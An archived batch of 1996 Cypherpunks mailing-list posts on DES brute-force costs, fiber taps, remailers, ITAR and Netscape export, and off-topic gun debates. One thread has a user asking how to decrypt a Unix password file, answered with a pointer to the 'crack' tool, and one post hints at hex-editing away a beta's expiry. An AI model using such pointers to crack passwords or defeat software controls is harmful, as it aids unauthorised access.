From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Jul 1996 12:30:29 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Bare fibers
In-Reply-To: <199607231622.JAA04074@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960723170725.23791A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 23 Jul 1996, jim bell wrote:

> At 03:20 AM 7/23/96 -0400, Rabid Wombat wrote:
> >
> >> 
> >> Doesn't that make it vulnerable (detectable) to Tempest attacks?
> 
> >No.
> >Transmitting light via fiber doesn't emit EM.
> >Anyway, the original post, as I recall, was about keeping sensitive data 
> >on a second hard drive, connected via (very thin, therefore harder to 
> >notice) fiber. Tempest monitoring was not a factor.
> 
> 
> It occurs to me that a bare fiber could actually be (randomly) hung across 
> treetops, roofs, power lines, and various other structures, over a 
> many-block distance in suburban areas.    Such a fiber wouldn't be protected 
> very well, but it would probably last a few months.  It would also be 
> exceedingly hard to find its terminations, and tracing it would be a real 
> pain.  (It probably wouldn't be visible against a bright sky more than a 
> meter or two away.)

It also would have little structural integrity - if you attached it to
trees, which sway in the wind, you'd have a broken fiber in a short time.
(The fiber doesn't even need to break, per se; microscopic cracking,
usually at the cladding, will ruin your fiber) (bird strikes would also be
a big problem, mostly for the bird)

Fiber optic cable usually has a kevlar sheath, and exterior aerial grade
fiber generally has a fiberglass rod inserted between the inner sheaths
and the exterior jacket. Water is also a factor - fiber buried in areas
where moisture is likely to be present (almost all applications) is
usually installed with a silicon gel between the interior jackets and the
exterior; water otherwise adheres to the exterior of the cladding, and
expands due to freezing. This causes fine fractures in the cladding, which
makes it more refractive - increasing chromatic dispersion, and therefore
a higher db loss on the cable. 

:)

ob crypto/privacy: Anybody have a good idea for detecting a tap on 
exterior fiber? I'd expect an attacker to have to interupt connectivity, 
terminate both ends of a break, and insert an active device. Thoughts?


> 
> Jim Bell
> jimbell@pacifier.com
> 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Jul 1996 06:42:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Boobytraps and the American Legal System
In-Reply-To: <ae198c8e1402100478ac@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960723173110.23875A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, Timothy C. May wrote:
> 
> Agree, very foolish to ever plant boobytraps in one's own home.
> 
> Still, I remember vividly in college when the court case was decided
> involving a guy in Florida who was tired of being burglarized and the cops
> doing nothing about it: he rigged a shotgun to go off when someone broke a
> window and entered. A perp did, was shot, survived, and the case went to
> trial.
> 
> The boobytrapper was found guilty of some serious crime--I don't recall the
> details (this was circa 1972).
> 

Set-guns are illegal in most, if not all jurisdictions (IANAL), as it is 
generally illegal to use deadly force to defend property. I would expect 
that any "booby-trap" would fall under the same legal category.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Wed, 24 Jul 1996 09:02:13 +0800
To: farber@cis.upenn.edu
Subject: Public briefing on the NRC cryptography policy report in...
Message-ID: <9606238381.AA838169687@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
Public briefing on the NRC cryptography policy report in Boston, August 7

  Cryptography's Role in Securing
  the Information Society
  
  
  A Public Briefing in Boston, Massachusetts
  Wednesday, August 7, 1996, 10:00 am to noon
  
  There will be a public briefing Boston, Massachusetts by the National
  Research Council on the report.  The briefing will be held at the
            Gardener
  Auditorium in the State House in Boston  on Wednesday, August 7, from
  10:00 AM to 12:00 noon.  Check http://www.tiac.net/biz/bcslegal
  for current information.  Authoring committee member Elliot M. Stone will
  be among the presenters at the Boston briefing. Dr. Herbert Lin, study
            director
  and senior staff officer of CSTB, will be present.  The Boston Computer
  Society Legal Group, the Boston Bar Association and the Information
  Technology Division of the Commonwealth of Massachusetts are co-hosts
  for this event.  Questions from the audience will be entertained, and a
            limited
  number of pre-publication copies of the report will be available at that
            time.
  For further information, please contact Dan Greenwood at (617) 973-0071
            or
  DGreenwood @ state.ma.us.

  The event is open to the press and the public.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 11:24:54 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607222314.TAA12858@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.94.960723174600.973A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Perry E. Metzger wrote:

> Date: Mon, 22 Jul 1996 19:14:23 -0400
> From: "Perry E. Metzger" <perry@piermont.com>
> To: Ben Holiday <ncognito@gate.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Distributed DES crack 
> 
> 
> Ben Holiday writes:
> > I've a few machines around that could be dedicated almost full time to the
> > task. What are the bandwidth requirements?
> 
> Probably near zero. People can get sections of the search space
> parceled out to them.
> 
> Perry
> 

Well... as long as someone else is writing the code... I'm up for a small
section of search space.

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfUQHjAJap8fyDMVAQFFQwf7BxBxEOxHPMNOcWDeZCiThi4+iev8GjwO
iQeW1diio1KdjyWyO1j/VHMkmiE3fLxOwTA+eRUJNh80+vInE4Waz8O5LlqyBvOY
CylckQQl6q0ilPjJFcQSBLdChhmObqHVm60gPRaACXNyI394HIHudm1p84uyG1II
hGpU5o6q7GiQmf7B9ThlwCQAW/sGYGpKmJ150WYE7lHoZutJ96TfFrOYLPoR8h3b
z5qMoYLigdphOSFLDz8ewtRQO0c0oZepAJSclnFNj8nyIkHroviZ+/92kEnfRk0V
5B8SO9gwtfziletdTk7LrGAJwOIqvqi06+tXhQ/FtJohHEHC8MDo+Q==
=5Ep7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Jul 1996 07:41:59 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: NOISE: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607222349.AA01276@Etna.ai.mit.edu>
Message-ID: <Pine.BSF.3.91.960723174215.23875C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 22 Jul 1996 hallam@Etna.ai.mit.edu wrote:

>  
> >   Well, you're in a country of _free citizens_ now, Limey, so if you
> >don't like it, then go back to England - a whole nation of people who foam at
> >the mouth with pride and pleasure over their status as feudal _subjects_.
> 
> O.K. lets see if we brits were to offer you yankees the Windsors,
> plus an assortment of flunkies, corgies and stuff are you so sure that
> your people would reject it? After all someone sold you a bridge so
> it's not that implausible.
> 

America didn't by the bridge; an American bought the bridge. It was 
purchased as a theme park attraction. I think the Windsors would make an 
excellent theme park attraction. We'll put them down the road from 
Graceland. You can go see the Queen after you've visted the King ...

How much are you asking? (O.K. - how much minus the corgies?)

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 24 Jul 1996 20:03:11 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <2.2.32.19960723180827.0085a950@panix.com>
Message-ID: <Pine.SUN.3.91.960723174602.14678C-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

At 5:14 PM -0700 7/22/96, Ernest Hua wrote:
> 
> >>Or the way many blacks were lynched (physically and socially) in the South.
> >>Or the way many asians were segregated.  Or the way many ethnic groups
> >>fought each other in inner cities.
> >>
> >>These are cultural relics of the good ol' days I simply can do without.

To which Duncan Frissell responded:
 
> Few armed blacks were lynched.  Like--none.  

And let's not forget the Chinese.  Unarmed Chinese laborers 
where often robbed in 1849 California.  The existance and
vitality of San Francisco's Chinatown has been attributed to
the fact that--unlike their rural cousins--the SF Chinese
community armed itself with guns in response to racially
motivated violence against them.  The lived and prospered;
other, unarmed, California Chinese communities did not.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 24 Jul 1996 21:13:51 +0800
To: Matt Thomlinson <mattt@microsoft.com>
Subject: RE: Brute Force DES
In-Reply-To: <c=US%a=_%p=msft%l=RED-77-MSG-960723153957Z-593@tide19.microsoft.com>
Message-ID: <Pine.SUN.3.91.960723173252.13554C-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, Matt Thomlinson wrote:

> why not put together (a LOT of) disk space and we can build a table
> (read: "a cryptanalytic time-memory tradeoff") for cracking DES? Using
> the table, we could brute-search the DES keyspace in less time than it
> would take to do an exhaustive search of a 38 bit keyspace, according to
> the paper. 4 gigs is what, a couple of hundred nowadays?
> 
> Making DES equivalent to a 40-bit crack would take approx. 500Gig, but
> publishing the table would push DES out usefulness. Certainly we could
> scale back (make DES equivalent to a 45-bit crack?) if we don't have
> enough disk...

IMHO it's more expensive to go this route than to build a machine with
dedicate DES cracking chips. 2^40 = 1,099,511,627,776 or about 1 terabyte
worth of space, not 500G. 2^39 would be 500Gb. A 4Gb drive these days is 
$800, hardly a couple of hundred dollars. :)

Even so, that's a ton of hard drives. Further you need machines to hook 
these drives up to. Infact, you need a farm of machines.  Why?  You can 
only put 7 on a chain, and maybe if you're lucky four chains in a machine 
using four controllers.

A better idea might be to make small cheap computers, say based on 8086's 
or 68000's that replace the drive's controller card, or if that drive 
controller card is intelligent enough to be a CPU or contain one, burn 
EEPROMs.  Have the EEPROMs be able to generate DES (or any other 
cypher's) keyspace given a range, and then have them able to search the 
whole drive for a match.

Even so, if you build these drive boxes, all you've accomplished is to 
create a nice huge big searchable array.  You still will need some sort 
of logic to figgure out when it finds the right key, and you still can't 
do 3DES or recusively encrypted files, nor know when you've found the key 
for data you can't recognize - or rather have these drives recognize.

However: Reading a 4Gb drive end to end takes less than 2 hours.  I know 
this because I have a RAID array of them, and it takes 2 hours to 
rebuild, so since rebuilding an array requires reading from two drives 
and writing to one drive, reading a whole 4Gb drive at full speed would 
be something like maybe 1 to 1.5 hours(???)

You might be better off with 9.0Gb drives if you can afford them because 
you then have less controller logic cards to build.

The drives alone will cost $204,800.  $800*(2^40/(4*1024*1024*1024)).  
You could get a nice big discount if you buy that many, but this will 
also mean however much it will cost you to build the cpu cards for 
multiplied by 256 drives, plust the R&D cost, plus the network connection 
between all the CPU boards.

At that point you also run into the MTBF of the drives which means that 
your drives will fail quite often.

If you want to go dirt cheap on the CPU's while using this huge space
method, you could just buy something like 37 Mac IIsi's, hook each up to 7
of the drives (you'll have to partition the drives as they won't support
volumes that huge.) and network the machines using localtalk.  You won't
need a faster connection because all you need for networking is keyspace 
distribution and success reporting.  But then IIsi's are sloooow machines 
and your searches will suffer a hit from the lack of the machine's speed, 
plus all the overhead of having an operating system and using the SCSI 
chain to talk to the drives.

IIsi's go for $350-$500 nicely loaded... $14800 for 37 at $400 a pop, 
add the drives to that, plus the cost of writing the program and hooking 
all of this crap together and that'll be  $219,600.  Ya got that kinda 
dough to spare?

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Wed, 24 Jul 1996 00:00:05 +0800
To: "'cypherpunks@toad.com>
Subject: Code of Password File
Message-ID: <01BB78C3.B04FDB80@ip73.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


What is the code of password file of Unix? I have them but don't know how read them. Any file converter or viewer for that?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 24 Jul 1996 13:29:48 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Anonymous web servers
In-Reply-To: <199607230317.UAA18923@jobe.shell.portal.com>
Message-ID: <960723.182444.5Y6.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, hfinney@shell.portal.com writes about anonymous web
pages:

<snip>
> In some ways the role of the "meeting place" software is similar to an
> IRC server.  In fact, this concept could be thought of as HTTP over
> IRC.
>
> The big question mark is whether the meeting place would be blamed for
> the possibly illicit transactions it facilitates.
</snip>

I see a big parallel to the remailers.  Both are simply conduits.
Remailers have already been attacked for the content they've passed.
HTTP meeting places will surely catch the same kind of heat.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfVgIhvikii9febJAQGH+AP9E9XPMr2XMCYk9wDoYo/4gF4roJ15RyDO
UHQupCaI2+OopQd2utKw4s71DbmRYXkuhQflFjQdZoSaFOaG1xDfI2mwCJjb7TpV
xwJ9OFdAkOD3glgwnNX+xeUjTSzzViDefXR/ykm2eXxXCSfvcbhWZdncemQlDLv+
pKO2aEoOFpw=
=kwZV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 19:32:57 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: No more stupid gun thread ...
In-Reply-To: <199607230124.SAA01022@server1.chromatic.com>
Message-ID: <Pine.LNX.3.94.960723184159.973B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Ernest Hua wrote:

> Date: Mon, 22 Jul 1996 18:24:23 -0700 (PDT)
> From: Ernest Hua <hua@chromatic.com>
> To: cypherpunks@toad.com
> Cc: hua@chromatic.com
> Subject: No more stupid gun thread ...
> 
> Ok.  This thread has gone on long enough and covered just about every
> point except the one which I originally made in my first response,
> which is that I abhor the idea that kids should carry weapons (of any
> sort) to school as standard equipment.  In fact, I abhor the idea
> that kids should carry weapons at school for any reason.
> 
> Enough said.
> 
> I do not care to discuss:
> 
> 1.  Should kids have any weapons at any time?
> 
> 2.  Should kids have guns (specifically guns)?
> 
> 3.  Should kids know how to operate weapons of any sort?
> 

Would this be weapons as in "guns and knives" or weapons as in the NSA's
current "enforcement" of ITAR?

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfUdMzAJap8fyDMVAQFq6gf+Kp6eLa33HEUl2yVDDdh2EELfRRPhIRbY
GTn6iJtYBva/yJcPv4qIAqLvict4ZsEE2qtETRMLPDfL7dYDymgofURubXJGxMEL
vfu9IlpusKShp98o33gf6RnrpmAB01NmDaykxsCwuCMVMFIGHXw6RmmfLTVYHPOL
w6gS+Qkmzhv51+YUtzSGq5h4hUu7uPcx7c6fD/qKnChBcmRgMS+w9P5RywlRAZ2B
KSrIShkYxqhVyUL9HDca2qKqT8OXP4KdWMDCNAzMiRVEZn2A0N7TpJpVVN5r0hqT
IpGiENX2E/fOxTfqwD4dh5Wq1wIncaH//voEHEoMbG2k1KxuTPJFZA==
=qMLk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 23 Jul 1996 23:11:02 +0800
To: "'cypherpunks@toad.com>
Subject: Decrypt Unix Password File
Message-ID: <01BB78C7.358738E0@ip73.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


How can I decrypt Unix password file?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Wed, 24 Jul 1996 17:17:20 +0800
To: crypto@nas.edu
Subject: Public briefing on NRC Cryptography Policy Report in...
Message-ID: <9606238381.AA838173319@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
Public briefing on NRC Cryptography Policy Report in Boston, August 7

  Please post widely....
  
  Cryptography's Role in Securing
  the Information Society
  
  
  A Public Briefing in Boston, Massachusetts
  Wednesday, August 7, 1996, 10:00 am to noon
  
  There will be a public briefing Boston, Massachusetts by the National
  Research Council on the report.  The briefing will be held at the
            Gardener
  Auditorium in the State House in Boston  on Wednesday, August 7, from
  10:00 AM to 12:00 noon.  Check http://www.tiac.net/biz/bcslegal
  for current information.  Authoring committee member Elliot M. Stone will
  be among the presenters at the Boston briefing. Dr. Herbert Lin, study
            director
  and senior staff officer of CSTB, will be present.  The Boston Computer
  Society Legal Group, the Boston Bar Association and the Information
  Technology Division of the Commonwealth of Massachusetts are co-hosts
  for this event.  Questions from the audience will be entertained, and a
            limited
  number of pre-publication copies of the report will be available at that
            time.
  For further information, please contact Dan Greenwood at (617) 973-0071
            or
  DGreenwood @ state.ma.us.

  The event is open to the press and the public.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 17:30:40 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F3E441.446B@netscape.com>
Message-ID: <Pine.LNX.3.94.960723185632.973C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Tom Weinstein wrote:

> Date: Mon, 22 Jul 1996 13:27:45 -0700
> From: Tom Weinstein <tomw@netscape.com>
> To: Lucky Green <shamrock@netcom.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Netscape
> 
> Lucky Green wrote:
> > At 15:27 7/20/96, Tom Weinstein wrote:
> > 
> >> Why not consider what the consequences will be?  Do you seriously
> >> believe that this will make the government stop enforcing ITAR?  Do
> >> you believe it will make them change the law?  No.  What it will do
> >> is make them remove our permission to distribute this stuff.
> > 
> > I doubt that. PGP has been distributed for years with less safeguards
> > than Netscape. It is available on more free-world sites than Netscape
> > US. This did not prompt the powers that be to force MIT to take down
> > their site. The feds know that it is impossible to prevent software
> > that is available on the net from being exported. Why would they
> > harass Netscape once the inevitable happens?
> 
> Well, for starters, the genius who put it out there put out a beta,
> which has an expiration date, instead of waiting for the final release.
> Secondly, millions of people don't use PGP.

Hrmm.. a few glimpses at a hex->machine code chart and a simple hex editor
should get past _that_ now shouldn't it?

> 
> Also, notice the simple verification system MIT was allowed to use, and
> the complex one we're required to use.
> 

I'm curious, exactly whop is it that _required_ you to use that system.?

> -- 
> You should only break rules of style if you can    | Tom Weinstein
> coherently explain what you gain by so doing.      | tomw@netscape.com
> 
Style is standing up for what you beleive in.  Netscape obviously has
none, or they would be activly fighting the ITAR.

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfUhSDAJap8fyDMVAQFZmAf+JaD4Z5wmt6qkyvJK1nhg8xjZF4z0LoGi
AyhFZ8sAZCgcu65YVcH9NnwXgJCGdq/OK2eLZlydM8w/tnIZJtsgxnX5rf8gb7a2
zgC8G4lr8OPKZPDP/85z8au/sM5wkUZ/sR9w+yTBn+UOmLH9sl+1r07rzMku39Zj
LTrCp6B9I0TjaTQjiZyUaiClp67nJxobGWPDByTMMqJeN34V79ikRPBTI/FzcxD9
mk+TwyIVrHqFC117o2X4GuJbDPPqIWRBNDM1MpWmdECOOGEpkPydnJxmub+IaeBu
WN2wPNzE2m9FVHQ0YVIScIt4jw2t4rr46BxfeDT+UJPIkvvhq6+0Ww==
=NKO0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 24 Jul 1996 20:18:51 +0800
To: cypherpunks@toad.com
Subject: Re: Another fascist
In-Reply-To: <199607231331.PAA12009@basement.replay.com>
Message-ID: <DRkJRD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex de Joode <usura@replay.com> writes:
> In article <v03007807ae1a03b2bb71@[192.187.162.15]> you wrote:
> : One of the great friends of free speech on this list sent a forged cancel
> : message to the listbot to try to cancel my subscription.
>
> : The listbot, being reasonably well designed, ignored him and told me about
> : it, though I have no doubt less of a dunce could bring it off.
>
> : What a piece of slime! What do others think of this practice?
>
> : David
>
>
> Why, David, did you decide to subscribe to cypherpunks ?

SternFUD calling someone a fascist is a prime example of a (crack)pot calling
the cattle black. The corresponding Russian idiom is

                      Whose cow should moo
                   (Ch'ya by korova mychala)

Please don't follow up on SternFUD's articles. Thank you.

Down with the Usenet Cabal! All power to the GruborBots!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jul 1996 12:16:43 +0800
To: Tom Weinstein <deviant@pooh-corner.com>
Subject: Re: Netscape
Message-ID: <v02120d29ae1b3659c91c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:07 7/23/96, Tom Weinstein wrote:
>The Deviant wrote:
>>
>>> You should only break rules of style if you can   | Tom Weinstein
>>> coherently explain what you gain by so doing.     | tomw@netscape.com
>>
>> Style is standing up for what you beleive in.  Netscape obviously has
>> none, or they would be activly fighting the ITAR.
>
>Anyone who believes that Netscape is not actively fighting ITAR is a
>fool.

Amen.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Wed, 24 Jul 1996 22:37:48 +0800
To: cypherpunks@toad.com
Subject: WinSock Remailer Going On-Line Tonight
Message-ID: <199607232320.TAA64204@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

I'm pleased to announce that the WinSock Remailer is going
into operation tonight at 11:00 PM.

Please feel free to test it.  You can get the key by sending
a message to winsock@c2.org with the "Subject: remailer-key".

After about a week of further testing, I will be releasing the
executables to everyone who sent me a note asking to 
participate in the alpha test.  If you want to be included, 
please send me a note.

Here's the info for the remailer-list:

$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";

I'll be adding "post" to this list after I get a more thorough 
testing of the NNTP code that I added for authentication.  "latent"
is also pending.

The remailer will run every 60 seconds from 12:00 AM to 8:00 AM
every day and whenever I am online.  c2.org automatically spools
the messages when I am not connected.

Note:  alt.religion.scientology and alt.clearing.technology are
blocked.  I'm not interested in run-ins with either supporters
or detractors of the Church of Scientology.  Binary and picture
groups are also blocked, but only because I don't have the 
bandwidth to support them.

Anyone who has blocking lists that they want to share, please
send them to me.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Evenson <realtime@slack.net>
Date: Wed, 24 Jul 1996 17:09:48 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <ae19b70d1702100474bf@[205.199.118.202]>
Message-ID: <31F5637D.5E8BEEEC@slack.net>
MIME-Version: 1.0
Content-Type: text/plain


I have often thought that in spite of the raw numbers of commercial
Windows platform, the freely redistributable distributed computation
harnesses often end up doing much "more" of the computation.  If this is
the case, it would seem that some sort of Java VM system--such as that
which exists in all Netscape 3.0 with JRI--would be the more natural 
"target" for development efforts.  The recent licensing agreements from
JavaSoft for JDK source make me nervous about the use of Java though.

Can anybody point to a source which details Hardware/Software
combinations used in distributed cracks?  Maybe I can put some numbers
together.

-- 
"A screaming comes across the sky.  It has happened before, but there
is nothing to compare it to now."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 24 Jul 1996 10:10:32 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9606238381.AA838140676@smtplink.alis.ca>
Message-ID: <31F512FE.61133CF4@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> 
> perry@piermont.com writes:
> >Jefferson could have been a mass murderer for all I care. His words
> >may be evaluated fully independently of his actions. They are not
> >interdependent.
> 
> Many of our current politicians would be heartened by your sentiment:
>         Do as I say, not as I do.
> 
> Personally, I incline more towards the other cliche:
>         Actions speak louder than words.
> 

There's a lot to be said for "do as I say, not as I do".
In the words of, forgive me, J.R. "Bob" Dobbs,

	"I don't practice what I preach, 'cause I'm not the kind 
of man I'm preaching to."

:-)

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 24 Jul 1996 15:57:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Watermarks for copy protection in recent Billbo
In-Reply-To: <199607232200.PAA25339@mail.pacifier.com>
Message-ID: <Pine.SV4.3.91.960723200613.144A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> However, what is somewhat less 
> well-known is the fact that in order to keep higher frequencies from being 
> "aliased" (reflected to lower frequencies by heterodyne processes) it is 
> necessary to remove (by filtering) any frequency content above that maximum, 
> before sampling is done.

   Well, fudge sticks. That sounds like this thing called an "image" in 
heterodyne analog RF receivers. I know how those work.

What is the physical basis for "aliasing" as you describe, in the 
sampling theater of operations?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Wed, 24 Jul 1996 20:14:53 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: Decrypt Unix Password File
In-Reply-To: <Pine.LNX.3.93.960723131530.1031B-100000@smoke.suba.com>
Message-ID: <199607240114.UAA03230@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Tue, 23 Jul 1996, Dr.Dimitri Vulis KOTM wrote:
> > Jerome Tan <jti@i-manila.com.ph> writes:
> > > How can I decrypt Unix password file?
> > There are many programs that do this, e.g., look for 'crack'.
> > This attack can be made more difficult if you force your users not to use
> > easy-to-guess passwords, and if you use something like NIS and shadowing to
> > make the public part of the passwords harder to get.
> 
>      From my conversations with Mr. Tan, he seems to be a high school 
> bent of mischeif. He is the one who asked about penetating firewalls, 
> and now wants to know how to hack a unix passwd file. 
> 
>      Now, I am not philosophically opposed to hacking, unless you are doing
> it to a machine that I am responsible for, (in which case you'd better hope
> the FBI finds you before I do) but I don't think that it would be a good 
> idea to just give him the information. He would wind up getting caught all 
> too easily, and might point to this list as a source of information on 
> cracking techniques. 

Just what they want, anyway -- make cypherpunks look like villins.

> 
>      I don't know if this should go to the whole list, so you can 
> bounce it there if you think it proper.

I think you used your judgement well in this case.

There are many places to start learning about firewalls and UNIX security.
I recommend the _Building Internet Firewalls_ O'reilly book, as well as
_Practical UNIX & Internet Security_ as well.  I don't feel right about
spoon feeding cracking info to someone like this.

(PS:  The animal on the _Building Internet Firewalls_ book is hidden
behind the gates.  It is a Trojan Horse.  I heard this secondhand.)

> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 14:24:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607240318.UAA08747@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks
From: Bill Stewart
Date: 7/23/96

Tim wrote:
>| More realistically, 1000+ list members x 10% who make plans to
>| contribute x half of these who actually follow through x $10 = $500.
